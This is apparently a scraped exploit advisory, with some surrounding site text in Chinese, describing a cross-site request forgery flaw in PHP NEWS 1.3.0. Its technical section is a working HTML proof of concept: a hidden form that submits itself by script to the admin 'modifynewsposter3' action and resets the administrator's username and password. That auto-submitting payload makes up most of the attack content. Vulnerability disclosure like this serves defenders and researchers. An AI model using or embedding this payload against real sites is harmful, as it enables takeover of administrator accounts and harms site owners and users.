扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
*========================================================================================================= # Exploit Title: PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin) # Author: Meryem AKDOĞAN # Google Dork: - # Date: 16/10/2016 # Type: webapps # Platform : PHP # Vendor Homepage: http://newsphp.sourceforge.net # Software Link: https://sourceforge.net/projects/newsphp/ # Version: 1.3.0 *========================================================================================================= DETAILS ======================================== PHP NEWS 1.3.0 versions is vulnerable to CSRF attack (No CSRF token in place) meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), a form will be submitted to (http://sitename/path/index.php) that will change admin password. Once exploited, the attacker can login to the admin panel using the username and the password he posted in the form. RISK ======================================== Attacker can change admin password with this vulnerablity TECHNICAL DETAILS & POC ======================================== <html> <!— CSRF PoC —> <body> <form action=" http://site_name/phpnews/index.php?action=modifynewsposter3" method="POST"> <input type="hidden" name="id" value="7" /> <input type="hidden" name="newusername" value="meryem akdogan" /> <input type="hidden" name="username" value="meryem" /> <input type="hidden" name="password" value="meryem123." /> <input type="hidden" name="password2" value="meryem123." /> <input type="hidden" name="email" value="b@gmail.com" /> <input type="hidden" name="language" value="en_GB" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ======================================== |
体验盒子
